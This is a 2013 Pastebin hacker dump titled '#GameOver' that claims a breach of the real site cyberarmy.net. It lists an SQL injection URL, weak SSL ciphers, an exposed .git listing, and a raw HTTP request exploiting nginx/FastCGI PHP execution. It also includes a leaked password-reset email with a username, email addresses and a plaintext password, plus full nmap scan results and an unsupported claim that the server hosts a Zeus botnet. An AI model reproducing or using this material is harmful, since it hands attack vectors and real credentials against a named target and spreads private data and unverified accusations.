Advertisement
Guest User

#GameOver CyberArmy.net

a guest
Jan 8th, 2013
742
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.51 KB | None | 0 0
  1.  
  2. MMMMMMMMMMM M MMMMMMMMMM MM MMMMMMMM$ MMMMMMMMM MMMMMMMMMMM
  3. MMMMMMMMMMMMM MM =MMMMMMMMMM MM MMMMMMMMM MMMMMMMMM MMMMMMMMMMM
  4. MMMMMMM MMMMMMM MM MMMMMMMMMMM ~M MMMMMMMMM MMMMMMMMM MMMMMMMMMMM
  5. MMMMMMM IMMMMMM :M MMMMMMMMMMM M MMMMMMMMM OMMMMMMMMM MMMMMMM
  6. MMMMMMM IMMMMMM ,+ MMMMMMMMMMM7 M MMMMMMMMM MMMMMMMMMM MMMMMMM
  7. MMMMMMM IMMMMMM MMMMMMMMMMMM = MMMMMMMMMMMMMMMMMMMM MMMMMMM
  8. MMMMMMM M IMMMMM:MMMMMM ~ MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM
  9. MMMMMMMMMMMMMMM MMMMMM MMMMMM MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM
  10. MMMMMMMMMMMMMMM MMMMMM +MMMMM= MMMMMMMMMMMMM$MMMMMM MMMMMMMMMMM
  11. MMMMMMM MMMMMM MMMMMM MMMMMM MMMMMM+MMMMMM MMMMMM MMMMMMM
  12. MMMMMMM MMMMMM MMMMMMMMMMMMMM MMMMMM MMMMMM MMMMMM MMMMMMM
  13. DDDDDDD DDDDDD ?DDDDDDDDDDDDDD DDDDDD DDDDDD DDDDDD DDDDDDD
  14. 8888888 ~888888 888888888888888 888888 88888? 888888 88888888888
  15. =OOOOOOOOOOOOOO OOOOOOO OOOOOOZ OOOOOO OOOOO OOOOOO OOOOOOOOOOO
  16.  
  17.  
  18.  
  19. NMMMMMN M ~IIIIII: IIIIIII IIIIIIIIIII IIIIIII= IIIIII
  20. ~MMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
  21. MMMMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMMM MMMMMM
  22. MMMMMMM MMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMM MMMMMM MMMMMM
  23. MMMMMMM MMMMMMM MMMMMMM MMMMMM MMMMMMM MMMMMM MMMMMM OMMMMM
  24. MMMMMMM MMMMMMM MMMMMM ~MMMMMM MMMMMMM MMMMMM MMMMMM MMMMMM
  25. MMMMMMM MMMMMMM MMMMMM=OMMMMMM MMMMMMM MMMMMM ?MMMMMM MMMMMM
  26. MMMMMMM MMMMMMM MMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
  27. MMMMMMM MMMMMMM MMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
  28. MMMMMMM MMMMMMM =MMMMMMMMMMMM= MMMMMMMMMMM MMMMMM MMMMMM MMMMMM
  29. MMMMMMM MMMMMMM MMMMMMMMMMMM MMMMMMM MMMMMM MMMMMM MMMMMM
  30. NNNNNNN NNNNNNN NNNNNNNNNNNN NNNNNNN NNNNNN NNNNNN MNNNNN
  31. DDDDDDD DDDDDDD DDDDDDDDDDDD DDDDDDD DDDDDD DDDDDD
  32. 8888888 8888888 ?88888888888 88888888888 888888 888888 888888
  33. OOOOOOOOOOOOO = OOOOOOOOOO, OOOOOOOOOOO OOOOOO OOOOOO OOOOOO
  34. ZZZZZZZZZZZ . ZZZZZZZZZZ ZZZZZZZZZZZ ZZZZZZ ZZZZZZ ZZZZZ
  35.  
  36. ==============================================================================
  37. Target : www.cyberarmy.net
  38. ==============================================================================
  39.  
  40. [*]SQL
  41.  
  42. [+] Injection www.cyberarmy.net/mess/index.php?action=finishopenidlogin
  43. [-] DB Null %
  44.  
  45. Fucking SQL Server With No Database!
  46.  
  47. [+]SSL Fucked
  48.  
  49. SSL_DES_64_CBC_WITH_MD5
  50. SSL_RC2_128_CBC_EXPORT40_WITH_MD5
  51. SSL_RC4_128_EXPORT40_WITH_MD5
  52. TLS_DHE_RSA_WITH_DES_CBC_SHA
  53. TLS_RSA_WITH_DES_CBC_SHA
  54. TLS_RSA_DES_40_SHA
  55. TLS_RSA_RC2_40_MD5
  56. TLS_RSA_RC4_40_MD5
  57.  
  58. [*]Git Repository
  59.  
  60. $ cd /usr/local/www/public/mess/.git/
  61. $ ls
  62.  
  63. .gitignore
  64. COPYING
  65. EVENTS.txt
  66. Makefile
  67. README
  68. actions/accessadminpanel.php
  69. actions/accesstoken.php
  70. actions/all.php
  71. actions/allrss.php
  72. actions/apiaccountratelimitstatus.php
  73. ...
  74.  
  75. [*]Nginx PHP code execution via FastCGI
  76.  
  77. GET /GameOver.txt/hacked.php HTTP/1.1
  78. Cookie: PHPSESSID=5b68776ed8c3807c04116631346d8be2
  79. Host: cyberarmy.net
  80. Connection: Keep-alive
  81. Accept-Encoding: gzip,deflate
  82. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
  83. Accept: */*
  84. Content-Length: 6
  85.  
  86. www.cyberarmy.net/GameOver.txt/hacked.php
  87.  
  88. [*]IRC.CyberArmy.Net Fucked
  89.  
  90. eY3OwNYoUaLL fucked irc.cyberarmy.net
  91.  
  92. er1cbrux!efnet@icerslair.com> From: "CyberArmy"
  93. er1cbrux!efnet@icerslair.com> <webmaster@cyberarmy.net>
  94. er1cbrux!efnet@icerslair.com> To: "ViRsOveRiD"
  95. er1cbrux!efnet@icerslair.com> <sirexar@crazy-horse.net>
  96. er1cbrux!efnet@icerslair.com> Date: 28 Oct 2004, 01:09:30 PM
  97. er1cbrux!efnet@icerslair.com> Subject: Password Successfully Reset
  98. er1cbrux!efnet@icerslair.com> (virsoverid)
  99. er1cbrux!efnet@icerslair.com>
  100. er1cbrux!efnet@icerslair.com> ----------------------------------------
  101. er1cbrux!efnet@icerslair.com> ---------------------------------------
  102. er1cbrux!efnet@icerslair.com>
  103. er1cbrux!efnet@icerslair.com> The following is an automated email from
  104. er1cbrux!efnet@icerslair.com> CyberArmy.
  105. er1cbrux!efnet@icerslair.com>
  106. er1cbrux!efnet@icerslair.com> Hello,virsoverid
  107. er1cbrux!efnet@icerslair.com> This is a confirmation that your
  108. er1cbrux!efnet@icerslair.com> CyberArmy password
  109. er1cbrux!efnet@icerslair.com> has been reset to: 19aHPxl6
  110. er1cbrux!efnet@icerslair.com>
  111. er1cbrux!efnet@icerslair.com> --
  112.  
  113. ==============================================================================
  114. [+]Ports (Zues Botnet Hosted)
  115.  
  116. [*]22/tcp on 78.47.201.59
  117.  
  118. [*]25/tcp on 78.47.201.59
  119.  
  120. [*]80/tcp on 78.47.201.59
  121.  
  122. [*]443/tcp on 78.47.201.59
  123.  
  124. [*]53/tcp on 78.47.201.59
  125.  
  126. [*]9001/tcp on 78.47.201.59
  127.  
  128. citadel.cyberarmy.net
  129.  
  130. ------------------------------------------------------------------------------
  131.  
  132. 22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)
  133.  
  134. [*]ssh-hostkey: 1024 63:67:96:94:fd:65:b5:e0:f0:d8:d2:d3:ef:c9:8e:b8 (DSA)
  135.  
  136. [*]2048 ff:c2:0f:2a:24:62:3c:3d:88:cd:6f:bd:c1:c1:5e:0c (RSA)
  137.  
  138. ------------------------------------------------------------------------------
  139.  
  140. 25/tcp open smtp Sendmail 8.14.4/8.14.4
  141.  
  142. [*]smtp-commands: citadel.cyberarmy.net Hello [209.126.156.136], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
  143.  
  144. [*]2.0.0 This is sendmail version 8.14.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
  145.  
  146. ------------------------------------------------------------------------------
  147.  
  148. 53/tcp open domain ISC BIND 9.6.-ESV-R3
  149.  
  150. [*]dns-nsid:
  151.  
  152. [*]bind.version: 9.6.-ESV-R3
  153.  
  154. ------------------------------------------------------------------------------
  155.  
  156. 80/tcp open http nginx 1.0.4
  157.  
  158. [*]http-favicon: Unknown favicon MD5: B55D9F9D989F354D30F36BDBE863A43D
  159.  
  160. [*]http-methods: No Allow or Public header in OPTIONS response (status code 301)
  161.  
  162. [*]http-robots.txt: 2 disallowed entries
  163.  
  164. [*]/wiki/Special /wiki/index.php
  165.  
  166. [*]http-title: cyberarmy
  167.  
  168. [*]Requested resource was http://cyberarmy.net/
  169.  
  170. ------------------------------------------------------------------------------
  171.  
  172. 443/tcp open http nginx 1.0.4
  173.  
  174. [*]http-methods: No Allow or Public header in OPTIONS response (status code 400)
  175.  
  176. [*]http-title: 400 The plain HTTP request was sent to HTTPS port
  177.  
  178. [*]ssl-cert: Subject: commonName=cyberarmy.net
  179.  
  180. [*]Issuer: commonName=PositiveSSL CA/organizationName=Comodo CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
  181.  
  182. [*]Public Key type: rsa
  183.  
  184. [*]Public Key bits: 2048
  185.  
  186. [*]Not valid before: 2010-02-17T00:00:00+00:00
  187.  
  188. [*]Not valid after: 2011-02-17T23:59:59+00:00
  189.  
  190. [*]MD5: 687f 0fb1 c115 7c8e e9b4 e484 1d35 7c98
  191.  
  192. [*]SHA-1: 2ad7 17f9 64b4 0aa1 3299 5d2b 1aea 6900 2711 93f7
  193.  
  194. [*]ssl-date: 2013-01-08T08:57:51+00:00; +2s from local time.
  195.  
  196. [*]sslv2: server still supports SSLv2
  197.  
  198. ------------------------------------------------------------------------------
  199.  
  200. 9001/tcp open ssl/tor-orport?
  201.  
  202. [*]ssl-cert: Subject: commonName=www.ltfyd4rl5ma.net
  203.  
  204. [*]Issuer: commonName=www.4k56hozvhnjr35am5.net
  205.  
  206. [*]Public Key type: rsa
  207.  
  208. [*]Public Key bits: 1024
  209.  
  210. [*]Not valid before: 2013-01-08T08:24:25+00:00
  211.  
  212. [*]Not valid after: 2013-01-08T10:24:25+00:00
  213.  
  214. [*]MD5: 201a 82a0 1af8 d425 1196 dec2 b379 2f0d
  215.  
  216. [*]SHA-1: ff9c 11ce 8087 310c 24c5 9722 e1d2 48d8 54ed 0984
  217.  
  218. [*]ssl-date: 2013-01-08T08:57:51+00:00; +2s from local time.
  219.  
  220. ------------------------------------------------------------------------------
  221.  
  222. Zues Botnet Hosted On citadel.cyberarmy.net
  223.  
  224. [*]9090/tcp closed zeus-admin
  225.  
  226. [*]9091/tcp closed xmltec-xmlmail
  227.  
  228. ==============================================================================
  229.  
  230. [+]Operating System
  231.  
  232. Running: FreeBSD 7.X
  233.  
  234. OS CPE: cpe:/o:freebsd:freebsd:7
  235.  
  236. OS details: FreeBSD 7.1-PRERELEASE 7.2-STABLE, FreeBSD 7.2-RELEASE - 8.0-RELEASE
  237.  
  238. Uptime guess: 0.000 days (since Tue Jan 08 00:57:27 2013)
  239.  
  240. IP ID Sequence Generation: Busy server or unknown class
  241.  
  242. Service Info: OSs: FreeBSD, Unix; CPE: cpe:/o:freebsd:freebsd
  243.  
  244. ==============================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement